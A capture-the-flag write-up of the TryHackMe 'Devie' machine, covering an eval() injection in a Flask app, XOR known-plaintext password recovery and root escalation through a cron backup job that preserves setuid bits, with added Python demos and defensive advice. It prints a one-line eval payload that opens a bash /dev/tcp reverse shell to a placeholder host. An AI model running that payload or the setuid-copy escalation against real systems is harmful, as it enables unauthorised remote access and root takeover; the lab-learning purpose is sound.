{THM} Devie
Don't always trust what you can't see. This time I'm doing a medium challenge on a Linux machine, and I managed to learn about preserving file attributes, which matters when you try to escalate to root by copying a file such as /usr/bin/bash together with its permissions.
As usual, we start by scanning the ports. The interesting part here: no web server is up, but port 5000 has something to see.
What is it? A page full of math formulas. Below them, they give the source code. Let's check the source code; it might be about secure coding, or code that crashes, or something related to that.
Examining the source code in app.py, I found this dangerous function: eval(). The eval() function evaluates JavaScript code represented as a string and returns its completion value; Python's eval() in app.py does the same for Python expressions. It is far too easy for a bad actor to run arbitrary code when you use eval().
Let's exploit this with arbitrary code: a reverse shell.
__import__('os').system("bash -c 'bash -i >& /dev/tcp/machine/port 0>&1'")
Managed to get a reverse shell back to the listener on our machine. This method is also usable in pwn-type CTF challenges.
We got the first flag here. Next, reading the note, it mentions a password encoded in a "secure" XOR format.
Unfortunately, we cannot read the source code, since the file's permissions belong to root and Gordon.
Reading the sudo permissions, we can run that file as Gordon without a password.
sudo -u Gordon /usr/bin/python3 /opt/encrypt.py
Once we manage to execute the file, let's put in a dummy password to encrypt and see how it works.
Workflow
encoded text from the script -> base64 decode -> XOR decode using the text we entered as the "secret key" -> out comes the key Gordon used to encode his password!
Since we know both the original password and the encrypted one, let's find the key being used.
Given the secret key, let's put in the encoded password from the note and get Gordon's password.
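The workflow above is a textbook known-plaintext recovery against XOR, so here is an added example (not the challenge's encrypt.py, whose source the page never shows) that models it: encoding is assumed to be XOR with a repeating key followed by base64, as the workflow describes. The key, the dummy plaintext and Gordon's "password" are constructed values for the demo. It goes slightly beyond the write-up by also recovering the key's length (its repeat period), so a noted password longer than the dummy input can still be decoded.

```python
import base64
from itertools import cycle

# Constructed demo values; the real key and password are not on the page.
DEMO_KEY = b"s3cr3t"
DEMO_GORDON_PASSWORD = b"constructed-pass-2024"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against key, repeating the key as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def xor_encode(plaintext: bytes, key: bytes) -> str:
    """Assumed model of encrypt.py: XOR with the key, then base64."""
    return base64.b64encode(xor_bytes(plaintext, key)).decode()


def xor_decode(encoded: str, key: bytes) -> bytes:
    """Reverse of xor_encode: base64 decode, then XOR with the key."""
    return xor_bytes(base64.b64decode(encoded), key)


def recover_keystream(known_plaintext: bytes, encoded: str) -> bytes:
    """Known-plaintext step: C = P xor K, therefore K = P xor C.

    The result covers exactly len(known_plaintext) bytes of key material, so
    feed the script a dummy password at least as long as the target ciphertext
    when you can.
    """
    return xor_bytes(base64.b64decode(encoded), known_plaintext)


def smallest_period(ks: bytes) -> int:
    """Shortest unit the keystream repeats with, i.e. the real key length
    (only reliable when ks is at least one full key long)."""
    for p in range(1, len(ks) + 1):
        if all(ks[i] == ks[i % p] for i in range(len(ks))):
            return p
    return len(ks)


def recover_key(known_plaintext: bytes, encoded: str) -> bytes:
    ks = recover_keystream(known_plaintext, encoded)
    return ks[:smallest_period(ks)]


def decrypt_with_known(encoded_target: str, known_plaintext: bytes, encoded_known: str) -> bytes:
    """Full attack: recover the key from our own dummy input, decode the target."""
    return xor_decode(encoded_target, recover_key(known_plaintext, encoded_known))


if __name__ == "__main__":
    dummy = b"A" * 24                      # what "we" typed into the script
    enc_dummy = xor_encode(dummy, DEMO_KEY)  # what the script printed back
    enc_note = xor_encode(DEMO_GORDON_PASSWORD, DEMO_KEY)  # the password in the note
    print("recovered key:", recover_key(dummy, enc_dummy))
    print("Gordon's password:", decrypt_with_known(enc_note, dummy, enc_dummy))
```

The lesson for anyone writing such a script is that XOR with a fixed key is a keystream that never changes, so a single plaintext/ciphertext pair of our choosing gives away the whole key; the fix is a real cipher with a per-message nonce, not a longer XOR key.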
We have access to Gordon and got the second flag here. Next, we need to figure out how to escalate to root. As usual, do some vertical and horizontal searching.
Brief understanding: whatever happens in backups or reports gets copied to the other directory. But which is the source and which is the destination? That is what I used pspy64 for.
Checking with pspy64, I found a hidden cron job that runs /usr/bin/backup.
Checking what it does, I finally found the source and the destination.
Since it uses a wildcard, it will copy anything passed to it. But it cannot be a reverse shell, since it only reads files (I tried it; the shell came back as Gordon instead of root).
Here I ran into a problem with the file: the copy from reports to backups does not carry the exact permissions over, which makes it unable to execute as root. After looking at some notes on a website, I found that we need to use preserve=mode so that the copied file also keeps the same timestamp, permissions, and ownership.
Why --preserve=mode? Preserving file attributes: by default, the cp command copies files without preserving their attributes such as permissions, timestamps, and ownership. However, we can use the -p (or --preserve) option to preserve file attributes during the copy process.
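The mode-bit half of this is easy to see without a root cron job, so here is an added example (not the challenge's /usr/bin/backup, whose implementation the page does not show) that models the two cp behaviours in Python: shutil.copyfile copies only the contents, like plain cp, which also drops set-user-ID and set-group-ID bits; shutil.copy copies the permission bits as well, like cp --preserve=mode. It then runs the check a defender would want over the backup destination: list every file that arrived carrying setuid or setgid. The directory names and the demo file are constructed; the change of ownership to root that the real cron job causes cannot be reproduced here, since the demo runs as an ordinary user.

```python
import os
import shutil
import stat
import tempfile


def make_setuid_file(path: str) -> None:
    """Create a demo script and set mode 4755 on it (an owner may set the
    setuid bit on their own file without being root)."""
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho demo\n")
    os.chmod(path, 0o4755)


def has_setuid(path: str) -> bool:
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def copy_like_cp(src: str, dst: str, preserve_mode: bool) -> None:
    """Model of the two cp behaviours (assumption: the backup tool behaves like cp).

    preserve_mode=False -> shutil.copyfile: new file gets the default mode under
    the umask, so setuid/setgid never survive (plain `cp`).
    preserve_mode=True  -> shutil.copy: contents plus permission bits, setuid
    included (`cp --preserve=mode`).
    """
    if preserve_mode:
        shutil.copy(src, dst)
    else:
        shutil.copyfile(src, dst)


def find_setuid(root: str) -> list:
    """Defender check: every regular file under root with setuid or setgid set.
    Run this over a backup destination written by a privileged job."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)  # lstat: do not follow symlinks into other trees
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(p)
    return sorted(hits)


def demo() -> dict:
    """Build a reports/ and backups/ pair, copy a setuid file both ways, audit."""
    with tempfile.TemporaryDirectory() as tmp:
        reports = os.path.join(tmp, "reports")
        backups = os.path.join(tmp, "backups")
        os.makedirs(reports)
        os.makedirs(backups)
        src = os.path.join(reports, "tool")
        make_setuid_file(src)
        copy_like_cp(src, os.path.join(backups, "plain"), preserve_mode=False)
        copy_like_cp(src, os.path.join(backups, "preserved"), preserve_mode=True)
        return {
            "plain_keeps_setuid": has_setuid(os.path.join(backups, "plain")),
            "preserved_keeps_setuid": has_setuid(os.path.join(backups, "preserved")),
            "audit_hits": [os.path.basename(p) for p in find_setuid(backups)],
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

For the maintainer of such a backup job the takeaway is the mirror image of the write-up: a privileged copy that preserves mode from a directory other users can write to will faithfully reproduce their setuid bits under root ownership, so either drop --preserve=mode (or pass --no-preserve=mode) on that path or run the audit above after each backup.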
Pwn CTF challenge in Vulnerable Machine
Preserving file bypass